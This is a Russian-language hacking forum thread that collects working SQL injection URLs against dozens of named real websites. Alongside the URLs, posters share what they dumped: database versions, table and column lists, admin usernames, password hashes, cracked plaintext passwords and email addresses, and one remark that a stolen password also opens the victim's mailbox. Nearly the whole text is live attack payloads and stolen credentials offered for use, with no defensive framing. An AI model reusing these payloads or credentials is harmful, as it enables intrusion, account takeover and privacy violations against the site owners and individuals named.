SQL Инъекции

Заканчиваю тему ювелирок:
__________________

http://affiliate.findjewellery.co.uk/news-article.php?id=-12+union+select+1,2,version(),4,5,6,7,8/*

4.1.22-standard

__________________

http://www.mardojewellery.com.au/product_list.php?ID=28+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+admin/*

4.1.22-standard-log
__________________

http://www.kestanejewellery.com/page.php?id=-426'+union+select+1,concat_ws(0x3A3a,id,type,user,password),3,4,5+from+users/*

5.0.45-log

19::admin ::karen:: opera
__________________

http://www.weddingsinwinnipeg.ca/jewellery.php?id=-107+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3A3a,password),12+from+administrators/*

4.1.20

9dfc5c7e39fc03ffb9698d37984d68a2::billion

__________________

http://www.georgejewellery.com/article.php?id=-28+union+select+version()/*

4.1.19-log

 

http://www.keckobservatory.org/article.php?id=-231+union+select+1,2, 3,4,5,6,7,8,9,10,11/*

Database Version: 4.1.22
Database name: keck
User name: keck@localhost

Вроде не было если было извиняйте...

 

http://vectoraerospace.ca/news.php?id=77+union+select+1,2,3,4,5,6,7,8,9/*
Выводимые {3},4,6,7,8,9

Database Version: 5.0.45
Database name: vector_db
User name: web@localhost

table admin_users
+user_id
+login_name
+password
+name
+level

vector:28e66ff14ddae884ee643708b8fe40be: Administrator pass: 105Bedford
dave mcgrath:57b1bd2bafca5a7ce9793b4b1f83b7b7:Administrator: pass: raider
phil.self:e2f33497edb409cb56f1a629a45885a8:Administrator: pass: SIGMA1
evelyn.hensman:c1d96395bdac759e16b98789581c70d7:Administrator pass: poprocks


Админка: http://vectoraerospace.ca/admin/

 

http://maadesign.co.uk/newsdetails.php?id=9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*

version:4.1.22-standard
user:maa2_wwsol@localhost
database:maa2_wwsolution

 

nova:race26
drrobinson:window
rep:novagroup
ftplimited:evesham
castlebridge:egremont
edenvalleyenrith
seniorswindows:kippax
leekglass:compton
cheadleglass:stockport
northernglass:rivulet
bebington:wirral
conservatoriesower
kingdomwindows:glenrothes
idealwindows:hinge
ricks:focus
kirkton:Carluke
reps:belvedere
southcheshire:crewe
britwood:britwood
congleton:georgia
mmjoinery:butterber
RGowing:vale
centralglass:windowcill99
Paul:novagroup
studleycons:shawbank
DDCL:zouch
WardGlass:FREEL
perennial:marple
meirglass:sandon
econnor:joinery
johnroberts:Forwyn
chambers:workington
humberside:trafford
gpearce:weir
patelever:hazel
tjones:cibyn
wearingbuild:wirral
washington:derby
dgms:york
meadowview:bronhaul
orionwindows:audax
davehopton:braemar
csglaziers :Buckley
taplastics:ctudhoe

 

скуди в joomla:

Code:

http://www.feellove.eu/exptemp/index.php?option=com_expshop&page=show_payment&catid=-2+UNION+SELECT+1,2,concat(username,0x3a,password)+FROM+jos_users--

логин/пасс:

Code:

admin:eb9d2dcd0b8beb9c3ae60f21d0e78578

---------------------------------

Code:

http://www.gamenuke.org/index.php?option=com_expshop&page=show_payment&catid=-2+UNION+SELECT+1,1,concat(username,0x3a,password)+FROM+jos_users--

логин/пасс:

Code:

Atomm:c404d8ecb25650f4c75911e4cca03563:jw9dEIiUcxCZIgQy

-----------------------------------

Code:

http://phhboxing.org/index.php?option=com_expshop&page=show_payment&catid=-2+UNION%20SELECT+1,2,concat(username,0x3a,password)+FROM+jos_users--

логин/пасс:

Code:

ninjiharris:dbafe7bfe987485c997fc65ccf2530bf:sDYp0Go5mwiG0df6

---------------------------------

Code:

http://www.toybrickid.com/index.php?option=com_expshop&page=show_payment&catid=-2+UNION+SELECT+1,2,concat(username,0x3a,password)+FROM+jos_users--

логин/пасс:

Code:

admin:d6358b73f5c624301eea3a9ba9bfbd1b:BoDk5m5hVytohLhE

---------------------------------------

Code:

http://www.freewebstemplate.net/index.php?option=com_expshop&page=show_payment&catid=-2+UNION+SELECT+1,2,concat(username,0x3a,password)+FROM+jos_users--

логин/пасс:

Code:

admin:e64bdb8d05f73f025c859eede39007fe:oVZJ0FrZdvqfJyHo

---------------------------------------
php nuke:

Code:

http://www.ediliziaesistemi.com/modules.php?name=BookCatalog&op=category&catid=1-null+union+select+1,aid+from+nuke_authors--

Code:

http://www.ediliziaesistemi.com/modules.php?name=BookCatalog&op=category&catid=1-null+union+select+1,pwd+from+nuke_authors--

логин/пасс:

Code:

Elisabetta:e27cc622d1e87601a77f55087a40bf3f

расшифровка:

Code:

Elisabetta:613939

----------------------------------------------
The End!

 

Code:

http://www.je.is/index.php?option=com_ahsshop&do=default&vara=-99999/**/union/**/select/**/0,concat(username,0x3a,password),0x3a,3,4,0x3a,6,0x3a/**/from/**/mos_users/*&Itemid=0&sP=0

логин,пасс:

Code:

admin:0b3574ee3dc278785e266fe300688ab5

--------------------------------------

Code:

http://www.redinet.am/index.php?lng=-1+union+select+1,2,3,concat_ws(0x3a,name,pass),5,6,7,8,9,10,11+from+users+limit+0,1/*

логин,пасс:

Code:

editor:158de3c5219fa1bb

---------------------------------------

Code:

http://www.trainingteam.net/index.php?option=com_rekry&Itemid=60&rekryview=add&op_id=-1/**/union/**/select/**/1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20jos_users%20limit%201,1--

логин,пасс:

Code:

balihotchili:2be600495ab19e130b6ec56969156a56:8KkLPuai8wSUH19W

-------------------------------------

Code:

http://www.microhydropower.net/news/viewnews.php?ID=-1+UNION+SELECT+1,concat(username,0x3a,password),3,4,5,6,7+FROM+users--

логин,пасс:

Code:

kubu:freedom

--------------------------------------

Code:

http://www.berceaumagique.com/cat.php?id=-6+union+select+1,2,3,concat_ws(0x3a,login,0x3a,pass,0x3a,mail),5,6,7,8,9+from+admin+where+id=1--

логин,пасс,мыло:

Code:

charlotte:::407686174a65f5219d4b2132df7d29fa:::[email protected]

-----------------------------------------

Code:

http://www.ghanadate.co.uk/b.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,password),5,6,7,8,9,10/**/from/**/members/*

логин,пасс:

Code:

mofad:25eabb60d24d19239d075a7917c207a5

-----------------------------------------

Code:

http://www.mtvphil.com/news.php?id=-17+union+select+1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11+from+members+limit+0,1--

логин,пасс:

Code:

lenard:f1d8c6941e9b92bdc6d60615b069e882

---------------------------------------

Code:

http://www.almemo.org.al/rub.php?l=a&idr=12+and+1=2+union+all+select+1,2,3,concat(username,char(58),password),5,6,7,8+from+editor--

логин,пасс:

Code:

admin:fe01ce2a7fbac8fafaed7c982a04e229

---------------------------------------
The End!

 

Хакнем презики
contex-condom.ru
На уровне пакета

Code:

GET http://www.contex-condom.ru/link.php?lnk_id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,VERSION(),10,11-- HTTP/1.0
Host: www.contex-condom.ru

ответ

Code:

HTTP/1.1 302 Found
Date=Fri, 21 Nov 2008 20:56:49 GMT
Content-Type=text/html; charset=windows-1251
Transfer-Encoding=chunked
Connection=keep-alive
Keep-Alive=timeout=5
Server=Apache
Cache-Control=max-age=0
Expires=Fri, 21 Nov 2008 20:56:49 GMT
Location=[COLOR=YellowGreen]5.0.67-log[/COLOR]

таблы (учтите, они в разных БД, в этой с префиксом xru_)

Code:

chat_entries
chat_users
md_adm
md_adm2type
md_bbs
md_bbs_type
md_cnf
md_fil
md_img
md_lnk
md_tab
md_txt
md_type
md_usr
xru_adm
xru_adm2type
xru_banner_stats
xru_cnf
xru_downloads
xru_fil
xru_img
xru_lnk
xru_tab
xru_txt
xru_type

 

Еще шоп

Code:

http://www.marclothing.com/news.php?ax=v&n=9&id=9&nid=-58+union+select+1,version(),3,4,5--

 

Еще шоп

Code:

http://www.gocontempo.com/pages.php?id=-2/**/union/**/select/**/1,2,3,table_name,5,6,7,8,9,10,11,12,13,14+from+`information_schema`.tables--

Code:

http://www.gocontempo.com/pages.php?id=-2/**/union/**/select/**/1,2,3,group_concat(UserName,0x3a,UserPwd),5,6,7,8,9,10,11,12,13,14+from+tblusers--

 

Очередной шоп

Code:

http://www.sunshinejewelry.com/cs.php?id=-2+union/**/select/**/1,2,table_name,4/**/from/**/`information_schema`.tables+--+

 

Вот снова не большой збор скулей от меня:

Code:

http://www.tregu-kosovar.com/inseratedetails.php?id=247'+and+1=1+union+all+select+1,2,3,4,5,concat(username,char(58),passwort),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+az_user/*&refid=&lang=

логин/пасс:

Code:

leaa:21881

------------------------------------------------

Code:

http://www.albanianroyalfamily.com/index.php?faqe=shfaqlajm&lajmid=-9999+union+all+select+1,2,convert(concat_ws(char(58),username,password)+using+utf8),4,null,6,null,8,9+from+login--

логин/пасс:

Code:

admin:mbreti

---------------------------------------------

Code:

http://www.mycybermedia.com/listo_kategori.php?kategorianr=-9999+union+all+select+1,2,3,4,null,concat_ws(char(58),username,password),7,8,9,10,11,12+from+admin--

логин/пасс:

Code:

admin:admin 

------------------------------------------

Code:

http://www.albauto.com/rallyalbania/galeri_info.php?ida=26+and+1=2+union+all+select+1,2,3,concat(username,char(58),password),5,6+from+editor/*&page=29

логин/пасс:

Code:

 admin:ee99fafdaf801531af8861addda2603c

--------------------------------------------

Code:

http://www.environment.adanet.com.al/tekst.php?idt=16+and+1=2+union+all+select+1,concat(user,char(58),password),3,4,5,6,7,8,9,10+from+mysql.user/*

логин/пасс:

Code:

root:54c57d3714ca092d

------------------------------------------

Code:

http://www.reutov.net/iss/photo_news/news/newsone.php?id=-394%20union%20select%201,2,3,4,concat_ws(char(58),name,pass),6,7,8,9+from+users+limit+1,1/*

логин/пасс:

Code:

drupal:9536bdcd9e3faa581d6991b5d04ac4ec

-----------------------------------------

Code:

http://www.wonpwn.com/games.php?id=-2'+union+select+1,username,3,user_password,5,6,7,8,9,0,1+from+bb2_users+limit+1,1/*

логин/пасс:

Code:

JimmyDinner:2e4b43e13698dd4df580f90b76b0de2a

----------------------------------------

Code:

http://www.housescreen.be/ugroups.php?UID=1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4,5,6,7,8,9,10,11,12,13,14,15+from+signup--

логин/пасс:

Code:

frans:9d0aa885d8b6db599231726fd377f739
benny:74d39d16ccd8128184800880e529db76 
Eveline:c45817c7a68626d7428e95e3a0dad694 
Dsky:7d91594f16e9674749bc1cf3f91752af
Bart:008884c57916bb8fd80421cfed45ac38
[test:098f6bcd4621d373cade4e832627b4f6

-------------------------------------------

Code:

http://www.ajaxprojects.com/ajax/viewcategory.php?categoryid=-8+union+select+1,2,concat(username,0x3a,0x3a,password,0x3a,email),4,5,6,7+from+user/*

логин/пасс/мыло:

Code:

ajax::29062006:[email protected]

----------------------------------------------

Code:

http://www.heimlichinstitute.org/page.php?id=null+UNION+ALL+SELECT+1,convert(concat(user,0x3a,password)+using+latin1),3,4+FROM+mysql.user--

логин/пасс:

Code:

root:*C3F44A16E1B0CA7DABAA9587D64AF55B1C7833C4

-----------------------------------------------

Code:

http://www.donabauer.at/bookmarks//view_group.php?id=-1+union+select+0,1,concat_ws(0x3a,username,password),3,4,5,6,7+FROM+apb_users--

логин/пасс:

Code:

 gast:27wvfetVjvcRo

------------------------------------------------

Code:

http://www.aesouk.com/category.php?cate_id=-2+UNION+SELECT+1,concat_ws(0x3a,user_name,password),3,4+from+admin--

логин/пасс:

Code:

 Categories within admin:$1$p8EHR3eg$brgVoxx0n4udlQ35s2iCo0

-------------------------------------------------

Code:

http://www.schuetzenbund.de/shop/list.php?id=-21%27+union+select+1,concat_ws(char(58),name,password),3,4,5,6,7,8,9+from+user/*

логин/пасс:

Code:

admin:sh00ting

------------------------------------------------

Code:

http://www.solusihukum.com/artikel.php?id=-1+union+select+1,2,concat_ws(0x10,pwd,uid),4,5+from+user/*

логин/пасс:

Code:

jingklong:kong

Code:

agungjuga:agung

Code:

jalil:andy

---------------------------------------------

Code:

http://www.tiranatimes.com/newscat.php?id=5+and+1=1+union+all+select+1,concat(username,char(58),password),3,4,5+from+tt_users/*&cat=5

логин/пасс:

Code:

GEMA:GEMATT

---------------------------------------------
The End!

 

Code:

http://www.chicken.org.au/page.php?id=-150+union+select+1,2,3,4,5,login,7,password,9,10,11,12,13+from+users/*

Code:

http://www.rsphysse.anu.edu.au/nuclear/personnel.php?id=-50+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*

[email protected]
nucleus
5.0.45

Code:

access_log  awards  change_log  classifications  collaboration_files  contact_info  document_changes  document_classes  document_templates  documents  documents_emg_save  grant_classes  grant_schemes  grant_types  grants  groups_blurbs  groups_photos  job_adverts  notices  people_links  peoples_groups  peoples_publications  personnel  project_types  projects  projects_contacts  projects_types  publications  reference_transform  research_groups  resource_form_types  resource_forms  resource_link_types  resource_links  schedule_annotations  schedule_entries  schedule_equipment  schedules  seminars  tank_openings

Code:

http://ausmed.com.au/publications/displaybook.php?id=-38+union+select+1,aes_decrypt(aes_encrypt(version(),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*

4.1.11

 

4 версия, не получилось подобрать имена таблиц

 

имя таблицы - дефаулт: mysql.user

Вот только прав недостаточно:
Error 1142 : SELECT command denied to user 'tots'@'server213-171-218-213.livedns.org.uk' for table 'user'

 

Ну вот нашел http://www.rfbd.ru/info.php?id=-2+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14&region=&rubrika=3--
Version: 5.0.37-standard-log
Ну кароч на сайте ниче полезного не нашел!Воть ссылка на перебол таблиц
http://www.rfbd.ru/info.php?id=-2+union+select+1,2,3,4,table_name,6,7,8,9,10,11,12,13,14+from+information_schema.tables+limit+1,1&region=&rubrika=3--

 

Code:

http://www.k9magazine.com/pages.php?pid=7+and+0+union+select+1,convert(user()+using+latin1),3,4/*

user(): [email protected]
database(): k9magazine1
version(): 4.1.16-standard-log

 

http://www.fretz-music.co.uk/news.php?id=3+union+select+1,2 ,3,4,5,6,7/*

5.0.27
fretzdb@localhost
fretzdb

http://www.questionbox.org/news.php?type=news&id=3+union +select+1,2,3,4,5,6,7,8,9/*
4.0.27-max-log
[email protected]

http://www.gomountainlions.com/news.php?id=3+union +select+1/*
Database Version: 4.1.22-standard
Database name: athletics
User name: athletics@localhost


http://billiard4u.net/article/article.php?id=-39+union+select+1,2,version(),4,5,user(),7,8,9,database(),11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--

4.1.22-standard
main_mainbilluse@localhost
main_mainbilldb


http://www.econepal.org/news.php?id=14+union+select+1,2,3,4, 5,6,7--&newstype=1
Database Version: 5.0.67-community
Database name: econepal_econep
User name: [email protected]

 

4.1.22-standard
pollan_article@localhost

4.0.27-max-log
[email protected]

4.0.15
web25@localhost

4.0.26-standard
[email protected]

5.0.51a-community

 

Code:

http://www.americanschoolfes.com/admin.php?id=-5+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6--

5.0.51a-community-log:amschfes_jim@localhost:amschfes_amschfes

Code:

http://www.americanschoolfes.com/admin.php?id=-5+union+select+1,table_name,3,4,5,6+from+information_schema.tables+limit+32,1--

users_usr

Code:

http://www.americanschoolfes.com/admin.php?id=-5+union+select+1,column_name,3,4,5,6+from+information_schema.columns+where+table_name=0x75736572735f757372+limit+0,1--

Id_usr
firstname_usr
lastname_usr
pword_usr
userlevel_usr
username_usr
email_usr

Code:

http://www.americanschoolfes.com/admin.php?id=-5+union+select+1,concat(username_usr,0x3a,pword_usr,0x3a,email_usr),3,4,5,6+from+users_usr+limit+0,1--

jcamomile:ginger:[email protected]
mhasbrouck:hope4fez:[email protected]
elozano:tigers:[email protected] - пасс подходит на мыло.